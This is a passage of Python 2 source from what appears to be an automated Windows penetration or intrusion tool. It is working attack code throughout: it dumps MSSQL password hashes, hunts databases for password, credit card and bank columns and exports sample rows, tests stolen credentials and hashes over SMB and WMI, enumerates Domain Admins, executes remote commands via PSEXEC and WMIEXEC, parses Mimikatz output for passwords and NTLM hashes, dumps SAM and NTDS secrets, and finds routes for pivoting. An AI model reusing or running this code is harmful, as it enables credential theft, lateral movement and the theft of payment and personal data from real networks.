in str(tmpResultList) or \"2012\" in str(tmpResultList):\n        query=\"SELECT ''+ name + '\\t' + CONVERT(SYSNAME, password_hash, 1) + ' ' FROM sys.sql_logins\"\n        if len(domain)>0:\n            tmpResultList=runSQLQuery(hostNo,domain+\"\\\\\"+username,password,query)\n        else:            \n            tmpResultList=runSQLQuery(hostNo,username,password,query)\n        #for x in tmpResultList:\n        #   print x.split(\"\\t\")\n    else:\n        query=\"SELECT ''+ name + '\\t' + password + ' ' FROM master.dbo.sysxlogins;\"\n        if len(domain)>0:\n            tmpResultList=runSQLQuery(hostNo,domain+\"\\\\\"+username,password,query)\n        else:\n            tmpResultList=runSQLQuery(hostNo,username,password,query)\n    tmpResultList1=[]\n    for x in tmpResultList:\n        tmpUsername=x[0].split(\"\\t\")[0]\n        tmpPasswordHash=x[0].split(\"\\t\")[1]\n        if tmpUsername!='##MS_PolicyEventProcessingLogin##' and tmpUsername!='##MS_PolicyTsqlExecutionLogin##':\n            tmpResultList1.append([tmpUsername,tmpPasswordHash])\n    if len(domain)>0:\n        tmpFooter=(setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" | \"+(setColor(\"[MSSQL]\", bold, color=\"green\"))+\" | Dump Credentials\"\n    else:\n        tmpFooter=(setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | \"+username+\":\"+password+\" | \"+(setColor(\"[MSSQL]\", bold, color=\"green\"))+\" | Dump Credentials\"\n    print tmpFooter\n    print tabulate(tmpResultList1)\n\ndef dumpMSSQLIDF(hostNo,port,username,password,domain):\n    tmpResultList=[]\n    query=\"USE master; select @@version\"\n    if len(domain)>0:\n        tmpResultList=runSQLQuery(hostNo,domain+\"\\\\\"+username,password,query)\n    else:\n        tmpResultList=runSQLQuery(hostNo,username,password,query)\n    if \"2008\" in str(tmpResultList) or \"2012\" in str(tmpResultList):\n        query=\"SELECT ''+ name + '\\t' + CONVERT(SYSNAME, password_hash, 1) + ' ' FROM sys.sql_logins\"\n        if len(domain)>0:\n            tmpResultList=runSQLQuery(hostNo,domain+\"\\\\\"+username,password,query)\n        else:            \n            tmpResultList=runSQLQuery(hostNo,username,password,query)\n        #for x in tmpResultList:\n        #   print x.split(\"\\t\")\n    else:\n        query=\"SELECT ''+ name + '\\t' + password + ' ' FROM master.dbo.sysxlogins;\"\n        if len(domain)>0:\n            tmpResultList=runSQLQuery(hostNo,domain+\"\\\\\"+username,password,query)\n        else:\n            tmpResultList=runSQLQuery(hostNo,username,password,query)\n        #for x in tmpResultList:\n        #   print x.split(\"\\t\") \n\n    tmpDBList=[]\n    tmpTableList=[]\n    query=\"USE master; SELECT name FROM dbo.sysdatabases WHERE name NOT IN ('master', 'model', 'tempdb', 'msdb', 'Resource')\"\n    if len(domain)>0:\n        tmpResultList=runSQLQuery(hostNo,domain+\"\\\\\"+username,password,query)\n    else:\n        tmpResultList=runSQLQuery(hostNo,username,password,query)\n    for x in tmpResultList:\n        if x[0] not in tmpDBList:\n            tmpDBList.append(x[0])\n\n    for dbName in tmpDBList:\n        query='SELECT TABLE_NAME FROM '+dbName+'.INFORMATION_SCHEMA.TABLES;'\n        if len(domain)>0:\n            tmpResultList=runSQLQuery(hostNo,domain+\"\\\\\"+username,password,query)\n        else:\n            tmpResultList=runSQLQuery(hostNo,username,password,query)\n        for x in tmpResultList:\n            if [dbName,x[0]] not in tmpTableList:\n                tmpTableList.append([dbName,x[0]])\n    tmpKeywordList=[]\n    tmpKeywordList.append(\"passw\")\n    tmpKeywordList.append(\"username\")\n    tmpKeywordList.append(\"bank\")\n    tmpKeywordList.append(\"card\")\n    tmpKeywordList.append(\"credit\")\n    tmpKeywordList.append(\"ccnum\")\n\n    tmpSearchFoundList=[]\n    for x in tmpTableList:\n        dbName=x[0]\n        tableName=x[1]\n        query=\"use \"+dbName+\";SELECT name FROM syscolumns WHERE id=OBJECT_ID('\"+tableName+\"')\"\n        if len(domain)>0:\n            tmpResultList=runSQLQuery(hostNo,domain+\"\\\\\"+username,password,query)\n        else:\n            tmpResultList=runSQLQuery(hostNo,username,password,query)\n        for x in tmpResultList:\n            for word in tmpKeywordList:\n                if word in x[0]:\n                    tmpSearchFoundList.append([dbName,tableName,x[0]])\n    dict={}\n    for x in tmpSearchFoundList:\n        dbName=x[0]\n        tableName=x[1]\n        columnName=x[2] \n        if len(dict)>0:\n            tmpValue=dict[dbName+\"|\"+tableName]\n            dict[dbName+\"|\"+tableName]=tmpValue+\"|\"+columnName\n        else:\n            dict[dbName+\"|\"+tableName]=columnName\n    tmpResultList=[]\n    for key, value in dict.iteritems():\n        dbName=key.split(\"|\")[0]\n        tableName=key.split(\"|\")[1]     \n        tmpResultList.append([hostNo,dbName,tableName,value])\n    #if len(domain)>0:\n    #    tmpFooter=(setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" | \"+(setColor(\"[MSSQL] [Find Columns]\", bold, color=\"green\"))\n    #else:\n    #    tmpFooter=(setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | \"+username+\":\"+password+\" | \"+(setColor(\"[MSSQL] [Find Columns]\", bold, color=\"green\"))\n    #print tmpFooter\n    #print tabulate(tmpResultList,headers=[\"Host\",\"Database\",\"Table\",\"Column(s)\"])\n    tmpFooter=''\n    for x in tmpResultList:\n        tmpHostNo=x[0]\n        tmpDBName=x[1]\n        tmpTableName=x[2]\n        tmpColumnName=x[3]\n        if len(domain)>0:\n            tmpFooter=(setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" | \"+(setColor(\"[MSSQL] [Interesting Data]\", bold, color=\"green\"))\n        else:\n            tmpFooter=(setColor(\"[+]\", bold, color=\"green\"))+\" \"+hostNo+\":445 | \"+username+\":\"+password+\" | \"+(setColor(\"[MSSQL] [Interesting Data]\", bold, color=\"green\"))\n    #print \"\\n\"\n    for key, value in dict.iteritems():\n        dbName=key.split(\"|\")[0]\n        tableName=key.split(\"|\")[1]\n        if \"|\" not in value:\n            columnName=value\n        else:\n            columnName=value.replace(\"|\",\",\")\n        tmpColumnList=columnName.split(\",\")\n        tmpColumnList.insert(0,\"Host\")\n        tmpColumnList.insert(1,\"Database\")\n        tmpColumnList.insert(2,\"Table\")\n        query='use '+dbName+';select top 10 '+columnName+' from '+tableName+';'\n        try:\n            if len(domain)>0:\n                tmpResultList=runSQLQuery(hostNo,domain+\"\\\\\"+username,password,query)\n            else:\n                tmpResultList=runSQLQuery(hostNo,username,password,query)\n            tmpResultList1=[]\n            print tmpFooter\n            count=0\n            for x in tmpResultList:\n                if count==0:\n                    tmpResultList1.append([hostNo,dbName,tableName,x[0],x[1],x[2]])\n                if count>0:\n                    tmpResultList1.append(['','','',x[0],x[1],x[2]])\n            print tabulate(tmpResultList1,headers=tmpColumnList)\n            print \"\\n\"\n        except Exception as e:\n            print e\n            continue\n    return \n\ndef testMSSQL1(host,port,user,password,password_hash=None,domain=None,domainCred=True):\n    searchList=[]\n    searchList.append('passw')\n    searchList.append('credit')\n    searchList.append('card')\n    fp = tds.MSSQL(host, int(port))\n    fp.connect() \n    foundList=[]\n    try:\n        fp.login(None, user, password, domain, password_hash, domainCred)\n        fp.replies[TDS_LOGINACK_TOKEN][0]\n        dbVer=getSQLVersion(db,fp)\n        print dbVer\n        if \"2008\" in dbVer or \"2012\" in dbVer:\n            print dumpSQLHashes(db,fp,True)\n        else:\n            print dumpSQLHashes(db,fp,False)        \n        #listDatabases(db,fp)\n        dbName='mmsdata1'   \n        tableList=listTables(db,fp,dbName)\n        for x in tableList:\n            tableName=x[1]\n            results = (listColumns(db,fp,dbName,tableName))\n            for y in results:\n                columnName = y[2]\n                for word in searchList:\n                    if word in columnName.lower():\n                        if [y[0],y[1]] not in foundList:\n                            foundList.append([y[0],y[1]])\n    except Exception as e:\n        print e\n    fp.disconnect()\n    \n    fp = tds.MSSQL(host, int(port))\n    fp.connect() \n    fp.login(None, user, password, domain, password_hash, domainCred)\n    fp.replies[TDS_LOGINACK_TOKEN][0]\n    for x in foundList:\n        dbName=str(x[0])\n        tableName=str(x[1])\n        columnList=[]\n        results=(listColumns(db,fp,dbName,tableName))\n        for y in results:\n            columnList.append(y[2])\n        results=sampleData(db,fp,dbName,tableName)\n        try:\n            if len(results)>0:\n                with open(dbName+\"_\"+tableName+\".csv\", \"wb+\") as f:\n                    writer = csv.writer(f)\n                    writer.writerow(columnList)\n                    for y in results:\n                        writer.writerow(y.values())\n        except Exception as e:\n            continue\n#MSSQL Test\n\ndef testAdminAccess(tmphostno, tmpdomain, tmpusername, tmppassword, tmppasswordHash):\n    command=\"ipconfig.exe\"\n    results,status=runWMIEXEC(tmphostno, tmpdomain, tmpusername, tmppassword, tmppasswordHash, command)        \n    if len(results)>0 and type(results)!=None:\n        return True\n    else:\n        return False\n\ndef testDomainCredentials(username,password,passwordHash,ip,domain,silent):    \n    foundAdmin=False\n    aesKey = None\n    share = 'ADMIN$'\n    nooutput = False\n    k = False\n    dc_ip = None\n    command = 'ipconfig'\n    if username==\"guest\":\n        return False,foundAdmin\n    else:\n\n        if domain==None or len(domain)<1:\n            domain='WORKGROUP'\n        if password!=None:\n            passwordHash=None\n        else:\n            password=None\n        try:\n\n            executer = WMIEXEC(command,username,password,domain,passwordHash,aesKey,share,nooutput,k,dc_ip)\n            loginStatus=executer.run(ip)\n            resultsOutput=executer.getOutput()\n            if \"STATUS_LOGON_FAILURE\" in str(loginStatus):\n                if password!=None:\n                    if silent==False:\n                        print (setColor(\"[-]\", bold, color=\"red\"))+\" \"+ip+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" [Failed]\"\n                    return False,foundAdmin \n                else:\n                    if silent==False:\n                        print (setColor(\"[-]\", bold, color=\"red\"))+\" \"+ip+\":445 | \"+domain+\"\\\\\"+username+\":\"+passwordHash+\" [Failed]\"\n                    return False,foundAdmin \n            else:\n                if \"rpc_s_access_denied\" in str(loginStatus):\n                    if password!=None:\n                        if silent==False:\n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+ip+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" [OK]\"\n                        return True,foundAdmin \n                    else:\n                        if silent==False:\n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+ip+\":445 | \"+domain+\"\\\\\"+username+\":\"+passwordHash+\" [OK]\"\n                        return True,foundAdmin \n                else:\n                    if password!=None:\n                        if silent==False:\n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+ip+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" [OK][Admin]\"\n                        foundAdmin=True\n                        return True,foundAdmin \n                    else:\n                        if silent==False:\n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+ip+\":445 | \"+domain+\"\\\\\"+username+\":\"+passwordHash+\" [OK][Admin]\"\n                        foundAdmin=True\n                        return True,foundAdmin \n        except:\n            return False,foundAdmin\n\n\ndef testDomainCredentials1(username,password,hostNo):\n    ansi_escape = re.compile(r'\\x1b[^m]*m')\n    password = ansi_escape.sub('', password)\n    cmd = \"rpcclient -U \"+username+\"%'\"+password+\"' \"+hostNo+\"  -c 'enumdomgroups'\"\n    resultList = runCommand(cmd, shell = True, timeout = 30)\n    if \"group:\" in str(resultList):\n        return True\n    else:\n        return False\n\ndef getDomainAdminUsers(username,password,hostNo):\n    foundStatus=False\n    userList1=[]\n    cmd = \"rpcclient -U \"+username+\"%'\"+password+\"' \"+hostNo+\" -c 'enumdomusers'\"\n    resultList = runCommand(cmd, shell = True, timeout = 15)\n    if debugMode==True:\n        print cmd\n        print resultList\n    list1 = resultList[1].split(\"\\n\")\n    for x in list1:\n        try:        \n            domainUser = (x.split(\"] rid:[\")[0]).replace(\"user:[\",\"\")\n            userRID = (x.split(\"] rid:[\")[1])[0:len(x.split(\"] rid:[\")[1])-1]\n            userList1.append([domainUser,userRID])\n        except IndexError:\n            continue\n\n    cmd = \"rpcclient -U \"+username+\"%'\"+password+\"' \"+hostNo+\" -c 'enumdomgroups' | grep -i 'Domain Admin' | awk -F'rid:' '{print $2}' | sed 's:^.\\(.*\\).$:\\\\1:'\"\n    resultList = runCommand(cmd, shell = True, timeout = 15)\n    groupID = (resultList[1]).strip()\n    cmd = \"rpcclient -U \"+username+\"%'\"+password+\"' \"+hostNo+\" -c 'querygroupmem \"+groupID+\"' | awk -F']' '{print $1}' | awk -F'[' '{print $2}'\"\n    unFoundList=[]\n    resultList = runCommand(cmd, shell = True, timeout = 15)    \n    list1 = resultList[1].split(\"\\n\")\n    for x in list1:\n        found=False\n        for y in userList1:\n            if x==y[1]:\n                found=True\n                if y[0].lower() not in domainAdminList:\n                    domainAdminList.append(y[0].lower())\n        if found==False and len(x)>0:\n            unFoundList.append(x)\n    for x in unFoundList:\n        #cmd = \"/opt/local/bin/rpcclient -U \"+username+\"%\"+password+\" \"+ip+\" -c 'querygroupmem \"+x+\"' | awk -F']' '{print $1}' | awk -F'[' '{print $2}'\"\n        cmd = \"rpcclient -U \"+username+\"%\"+password+\" \"+ip+\" -c 'querygroupmem \"+x+\"' | awk -F']' '{print $1}' | awk -F'[' '{print $2}'\"\n        resultList = runCommand(cmd, shell = True, timeout = 15)\n        list1 = resultList[1].split(\"\\n\")\n        for x in list1:\n            for y in userList1:\n                if x==y[1]:\n                    if y[0].lower() not in domainAdminList:\n                        domainAdminList.append(y[0].lower())\n    if len(domainAdminList)>0:\n        print (setColor(\"\\nEnumerating Domain Admin Users Group\", bold, color=\"green\"))\n        for tmpusername in domainAdminList:\n            if len(domainAdminList)>0:\n                if tmpusername.lower() in domainAdminList:\n                    print tmpusername+\"[DA]\"\n                    foundStatus=True\n                else:\n                    print tmpusername   \n        print \"\\n\"       \n    return foundStatus\n\ndef runPSEXEC(targetIP,domain,username,password,passwordHash,command):\n    command='cmd /c echo . | '+command\n    resultsOutput=''\n    try:\n        executer = PSEXEC(command,None,None,None,int(445),username,password,domain,passwordHash,None,False,None)       \n        executer.run(targetIP,targetIP)\n        resultsOutput=executer.getOutput()\n        executer.clearOutput()\n        return resultsOutput\n    except Exception:\n        pass\n\ndef runSMBEXEC(targetIP,domain,username,password,passwordHash,command):\n    executer = CMDEXEC(username, password, domain, passwordHash, None, False, None, \"SHARE\", \"C$\", int(445), command)\n    executer.run(targetIP, targetIP)\n    resultsOutput = executer.getOutput()\n    executer.stop()\n    return resultsOutput\n\ndef runWMIEXEC(targetIP,domain,username,password,passwordHash,command):\n    resultsOutput=''\n    aesKey = None\n    share = 'ADMIN$'\n    nooutput = False\n    k = False\n    dc_ip = None\n    try:\n        executer = WMIEXEC(command,username,password,domain,passwordHash,aesKey,share,nooutput,k,dc_ip)\n        statusOutput=executer.run(targetIP)\n        resultsOutput=executer.getOutput()\n    except:\n            return 'STATUS_LOGON_FAILURE','STATUS_LOGON_FAILURE'\n    return resultsOutput,statusOutput    \n\ndef setDemo():\n    cmd ='date +%Y%m%d -s \"20120418\"'\n    runCommand1(cmd)\ndef checkCurrentTime():\n    currentTime=runCommand1(\"date\")\n    return currentTime\ndef checkRemoteTime(targetIP):\n    remoteTime=runCommand1(\"net time -S \"+targetIP)\n    return remoteTime\ndef get_process_children(pid):\n    p = Popen('ps --no-headers -o pid --ppid %d' % pid, shell = True,\n              stdout = PIPE, stderr = PIPE)\n    stdout, stderr = p.communicate()\n    return [int(p) for p in stdout.split()]\ndef runCommand(args, cwd = None, shell = False, kill_tree = True, timeout = -1, env = None):\n    class Alarm(Exception):\n        pass\n    def alarm_handler(signum, frame):\n        raise Alarm\n    p = Popen(args, shell = shell, cwd = cwd, stdout = PIPE, stderr = PIPE, env = env)\n    if timeout != -1:\n        signal(SIGALRM, alarm_handler)\n        alarm(timeout)\n    try:\n        stdout, stderr = p.communicate()\n        if timeout != -1:\n            alarm(0)\n    except Alarm:\n        pids = [p.pid]\n        if kill_tree:\n            pids.extend(get_process_children(p.pid))\n        for pid in pids:\n            # process might have died before getting to this line\n            # so wrap to avoid OSError: no such process\n            try: \n                kill(pid, SIGKILL)\n            except OSError:\n                pass\n        return -9, '', ''\n    return p.returncode, stdout, stderr    \ndef runCommand1(fullCmd):\n    try:\n        return commands.getoutput(fullCmd)\n    except Exception as e:\n        print e\n        return \"Error executing command %s\" %(fullCmd)\ndef setColor(message, bold=False, color=None, onColor=None):\n    retVal = colored(message, color=color, on_color=onColor, attrs=(\"bold\",))\n    return retVal\n\ndef convertWinToLinux(filename):\n    tmpFilename=\"/tmp/\"+generateRandomStr()+\".txt\"\n    sourceEncoding = \"utf-16\"\n    targetEncoding = \"utf-8\"\n    source = open(filename)\n    target = open(tmpFilename, \"w\")\n    target.write(unicode(source.read(), sourceEncoding).encode(targetEncoding))    \n    return tmpFilename\n\ndef parseMimikatzOutput(list1):\n    tmpPasswordList=[]\n    username1=\"\"\n    domain1=\"\"\n    password1=\"\"\n    lmHash=\"\"\n    ntHash=\"\"\n    list2=list1.split(\"\\n\")\n    for x in list2:\n        if \"Username :\" in x or \"Domain   :\" in x or \"Password :\" in x or \"LM       :\" in x or \"NTLM     :\" in x:\n            if \"* Username :\" in x:\n                username1=(x.replace(\"* Username :\",\"\")).strip()\n            if \"* Domain   :\" in x:\n                domain1=(x.replace(\"* Domain   :\",\"\")).strip()\n            if \"* LM       :\" in x:\n                lmHash=(x.replace(\"* LM       :\",\"\")).strip()\n            if \"* NTLM     :\" in x:\n                ntHash=(x.replace(\"* NTLM     :\",\"\")).strip()\n                if len(lmHash)<1:\n                    lmHash='aad3b435b51404eeaad3b435b51404ee'\n                password1=lmHash+\":\"+ntHash\n            if \"* Password :\" in x:            \n                password1=x.replace(\"* Password :\",\"\")\n            domain1=domain1.strip()\n            username1=username1.strip()\n            password1=password1.strip()\n            if len(username1)>1 and len(domain1)>1 and len(password1)>1: \n                #if (domain1!=\"(null)\" or username1!=\"(null)\" or password1!=\"(null)\"):\n                if domain1!=\"(null)\":                    \n                    if not username1.endswith(\"$\") and len(password1)<50:\n                        if \"\\\\\" in username1:\n                            domain1=username1.split(\"\\\\\")[0]   \n                            username1=username1.split(\"\\\\\")[1]   \n                        if len(password1)>0 and password1!='(null)':\n                            if [domain1,username1,password1] not in tmpPasswordList:\n                                tmpPasswordList.append([str(domain1),str(username1),str(password1)])\n                username1=\"\"\n                domain1=\"\"\n                password1=\"\"\n                lmHash=\"\"\n                ntHash=\"\"\n    #if len(tmpPasswordList)>0:\n    #    print (setColor(\"[+]\", bold, color=\"green\"))+\" Found the below credentials via Mimikatz\"\n    #    headers = [\"Domain\",\"Username\",\"Password\"]\n    #    print tabulate(tmpPasswordList,headers,tablefmt=\"simple\")\n    return tmpPasswordList\n\ndef analyzeHashes(hashList):\n    print (setColor(\"[+]\", bold, color=\"green\"))+\" Analyzing Hashes for Patterns\"\n    #Blank 31d6cfe0d16ae931b73c59d7e0c089c0\n    #NoLM  aad3b435b51404eeaad3b435b51404ee\n    tmpBlankHashList=[]\n    tmpHashList={}        \n    for x in hashList:\n        if \"31d6cfe0d16ae931b73c59d7e0c089c0\" in x:\n            if x not in tmpBlankHashList:\n                tmpBlankHashList.append(x)\n        username=x.split(\":\")[0]\n        uid=x.split(\":\")[1]\n        tmpHash=x.split(\":\")[2]+\":\"+x.split(\":\")[3]    \n        if tmpHash not in tmpHashList:   \n            tmpHashList[tmpHash]=username\n        else:\n            tmpStr = tmpHashList[tmpHash]\n            tmpStr += \", \"+username\n            tmpHashList[tmpHash]=tmpStr\n    tmpResultList=[]\n    for key, value in tmpHashList.iteritems():\n        tmpResultList.append([key,value])\n    if len(tmpResultList):\n        print \"Password Hashes Used By the Below Accounts\"\n        print tabulate(tmpResultList)\n    if len(tmpBlankHashList):\n        print \"\\nAccounts Using BLANK Password\"\n        for x in tmpBlankHashList:\n            print x\n\ndef analyzeHashes1(hashList):\n    print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Analyzing Hashes for Patterns\"\n    tmpHashList={}        \n    for x in hashList:\n        tmpip=x[0]\n        tmpdomain=x[1]\n        tmpusername=x[2]\n        tmppasswordHash=x[3]\n        if tmppasswordHash not in tmpHashList:   \n            tmpHashList[tmppasswordHash]=tmpip+\"(\"+tmpusername+\")\"\n        else:\n            tmpStr = tmpHashList[tmppasswordHash]\n            tmpStr += \"\\n\"+tmpip+\"(\"+tmpusername+\")\"\n            tmpHashList[tmppasswordHash]=tmpStr\n    tmpResultList=[]\n    for key, value in tmpHashList.iteritems():\n        if [key,value] not in tmpResultList:\n            tmpResultList.append([key,value])\n    if len(tmpResultList):\n        headers = [\"Hashes\",\"Host/Username\"]\n        for x in tmpResultList:\n            hashStr=x[0]\n            hostStr=x[1]\n            if \"aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0\" in hashStr:\n                print \"[*] The below accounts have a blank password\"\n            else:\n                print \"[*] The below accounts use the password hash \"+hashStr\n            print hostStr\n            print \"\\n\"\n        #print tabulate(tmpResultList,headers)\n\ndef analyzePasswords(tmpPassList):\n    print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Analyzing Passwords for Patterns\"\n    tmpPassList1={}        \n    for x in tmpPassList:\n        tmpip=x[0]\n        tmpdomain=x[1]\n        tmpusername=x[2]\n        tmppassword=x[3]\n        if tmppassword not in tmpPassList1:   \n            tmpPassList1[tmppassword]=tmpip+\"(\"+tmpusername+\")\"\n        else:\n            tmpStr = tmpPassList1[tmppassword]\n            tmpStr += \", \"+tmpip+\"(\"+tmpusername+\")\"\n            tmpPassList1[tmppassword]=tmpStr\n    tmpResultList=[]\n    for key, value in tmpPassList1.iteritems():\n        tmpResultList.append([key,value])\n    if len(tmpResultList):\n        headers = [\"Password\",\"Host/Username\"]\n        print \"Password Used By the Below Accounts/Hosts\"        \n        print tabulate(tmpResultList,headers)\n\n\ndef dumpDCHashes(tmphostno,tmpdomain,tmpusername,tmppassword,tmppasswordHash):\n    dumper1 = DumpSecrets(tmphostno, tmpusername, tmppassword, tmppasswordHash, tmpdomain)\n    dumper1.dump()\n    lines=[]\n    time.sleep(10)\n    tmpLines1=[]      \n    tmpFoundFile=''\n    if os.path.exists('secrets.ntds'):\n        tmpFoundFile='secrets.ntds'\n    elif os.path.exists('secrets.sam'):\n        tmpFoundFile='secrets.sam'\n    if os.path.exists('secrets.ntds'):\n        if tmpFoundFile=='secrets.ntds':\n            with open('secrets.ntds') as f:\n                lines = f.read().splitlines()\n                for x in lines:\n                    if not (x.split(\":\")[0]).endswith(\"$\"):\n                        if x not in tmpLines1:\n                            tmpLines1.append(x)\n            if len(tmpLines1)>0:\n                if len(tmpdomain)<1:\n                    tmpdomain=\"WORKGROUP\"\n                if tmppassword==None:\n                    tmpHostList=[]\n                    for z in accessAdmHostList:\n                        tmpHostList.append(z[0])\n                    if tmphostno not in tmpHostList:\n                        if [tmphostno, tmpdomain, tmpusername, tmppasswordHash] not in accessAdmHostList:\n                            accessAdmHostList.append([tmphostno, tmpdomain, tmpusername, tmppasswordHash])                            \n                else:\n                    tmpHostList=[]\n                    for z in accessAdmHostList:\n                        tmpHostList.append(z[0])\n                    if tmphostno not in tmpHostList:\n                        if [tmphostno, tmpdomain, tmpusername, tmppassword] not in accessAdmHostList:\n                            accessAdmHostList.append([tmphostno, tmpdomain, tmpusername, tmppassword])\n                for x in tmpLines1:\n                    print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+tmphostno+\":445 | \"+(setColor(\"[SAM]\", bold, color=\"green\"))+\" | \"+x\n                print \"\\n\"\n    if os.path.exists('secrets.sam'):\n        if tmpFoundFile=='secrets.sam':\n            with open('secrets.sam') as f:\n                lines = f.read().splitlines()\n                for x in lines:\n                    if not (x.split(\":\")[0]).endswith(\"$\"):\n                        if x not in tmpLines1:\n                            tmpLines1.append(x)\n            if len(tmpLines1)>0:\n                if len(tmpdomain)<1:\n                    tmpdomain=\"WORKGROUP\"\n                if tmppassword==None:\n                    tmpHostList=[]\n                    for z in accessAdmHostList:\n                        tmpHostList.append(z[0])\n                    if tmphostno not in tmpHostList:\n                        if [tmphostno, tmpdomain, tmpusername, tmppasswordHash] not in accessAdmHostList:\n                            accessAdmHostList.append([tmphostno, tmpdomain, tmpusername, tmppasswordHash])                            \n                else:\n                    tmpHostList=[]\n                    for z in accessAdmHostList:\n                        tmpHostList.append(z[0])\n                    if tmphostno not in tmpHostList:\n                        if [tmphostno, tmpdomain, tmpusername, tmppassword] not in accessAdmHostList:\n                            accessAdmHostList.append([tmphostno, tmpdomain, tmpusername, tmppassword])                            \n                #print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" List of Valid Hashes\"\n                for x in tmpLines1:\n                    print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+tmphostno+\":445 | \"+(setColor(\"[SAM]\", bold, color=\"green\"))+\" | \"+x\n                print \"\\n\"\n    if os.path.exists('secrets.sam'):\n        os.remove('secrets.sam')\n    if os.path.exists('secrets.ntds'):\n        os.remove('secrets.ntds')\n    return tmpLines1\n\ndef runRemoteCMD(targetIP,domain,username,password,passwordHash,command):\n    if debugMode==True:\n        print command\n    results=runSMBEXEC(targetIP, domain, username, password, passwordHash, command)    \n    return results \n\ndef testAccount(targetIP, domain, username, password, passwordHash):\n    if username!=\"guest\":\n        if domain==None or len(domain)<1:\n            domain='WORKGROUP'\n        cmd='whoami'\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, cmd) \n        if 'STATUS_LOGON_FAILURE' in str(status):\n            if len(domain)>0:\n                print (setColor(\"[-]\", bold, color=\"red\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" [Failed]\"            \n            else:\n                print (setColor(\"[-]\", bold, color=\"red\"))+\" \"+targetIP+\":445 | \"+username+\":\"+password+\" [Failed]\"            \n            return False\n        elif 'rpc_s_access_denied' in str(status):\n            if len(domain)>0:\n                print (setColor(\"[-]\", bold, color=\"red\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" [OK]\"            \n            else:\n                print (setColor(\"[-]\", bold, color=\"red\"))+\" \"+targetIP+\":445 | \"+username+\":\"+password+\" [OK]\"            \n            return False        \n        else:\n            if len(domain)>0:\n                print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" [OK][Admin]\"            \n            else:\n                print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+username+\":\"+password+\" [OK][Admin]\"            \n            return True\n\ndef testAccountSilent(targetIP, domain, username, password, passwordHash):\n    if username!=\"guest\":\n        cmd='whoami'\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, cmd) \n        if 'STATUS_LOGON_FAILURE' in str(status) or \"rpc_s_access_denied\" in str(status):\n            return False\n        else:\n            return True\n\ndef testPowershell(targetIP, domain, username, password, passwordHash):\n    cmd = 'powershell -Command $PSVersionTable.PSVersion'\n    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, cmd) \n    if 'This program is blocked by group policy. For more information, contact your system administrator.' in results:\n        #print (setColor(\"[-]\", bold, color=\"red\"))+\" \"+targetIP+\":445 [Powershell] | \"+results.strip()\n        print (setColor(\"[-]\", bold, color=\"red\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[powershell]\", color=\"green\"))+\" | Blocked By AppLocker\"\n\n        return False\n    else:\n        #if \"rpc_s_access_denied\" in results:        \n        #    return False\n        #else:\n        return True\n\ndef addressInNetwork(ip, net):\n   import socket,struct\n   ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)\n   netstr, bits = net.split('/')\n   netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)\n   mask = (0xffffffff << (32 - int(bits))) & 0xffffffff\n   return (ipaddr & mask) == (netaddr & mask)\n\ndef processMimikatzTxt(tmpFilename):\n    foundFile=False\n    results=''\n    while foundFile==False:\n        tmpFilename1=origScriptPath+\"/loot/\"+tmpFilename\n        if os.path.exists(tmpFilename1) and (os.stat(tmpFilename1).st_size != 0):\n            tmpFilename1=convertWinToLinux(origScriptPath+\"/loot/\"+tmpFilename)\n            with open(tmpFilename1, 'r') as content_file:\n                results = content_file.read()\n                foundFile=True\n        else:\n            time.sleep(1)\n    return results\n\ndef findRoute(targetIP,domain,username,password,passwordHash):\n    command = 'route print'\n    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,command) \n    tmpResultList=results.split(\"\\n\")\n    foundStart=False\n    tmpRouteList=[]\n    for x in tmpResultList:\n        if foundStart==True:\n            if \"===========================================================================\" in x:\n                foundStart=False\n            else:\n                if \"On-link\" in x:\n                    y=(x.split(\"On-link\")[0]).strip()\n                    z=(y.split(\" \"))\n                    g=z[0]+\"/\"+str(IPAddress(z[-1]).netmask_bits())\n                    if g not in tmpRouteList:\n                        if not g.startswith(\"127.0.\") and not g.startswith(\"255.255.255.255\") and not g.startswith(\"224.0.0.0/4\"):\n                            tmpRouteList.append(g)\n        if \"Network Destination        Netmask          Gateway       Interface  Metric\" in x:\n            foundStart=True\n\n    tmpIPList1=ipList\n    for x in nbList:\n        nbNetwork=x.split(\".\")[0]+\".\"+x.split(\".\")[1]+\".\"+x.split(\".\")[2]+\".\"  \n        tmpCount=0\n        while tmpCount<256:\n            tmpnbNetwork=nbNetwork+str(tmpCount)\n            if tmpnbNetwork in tmpIPList1:\n                tmpIPList1.remove(tmpnbNetwork)\n            tmpCount+=1\n\n    for x in tmpRouteList:\n        foundStart=False\n        for y in tmpIPList1:\n            if y!=targetIP and addressInNetwork(y, x)==True:\n                foundStart=True\n        if 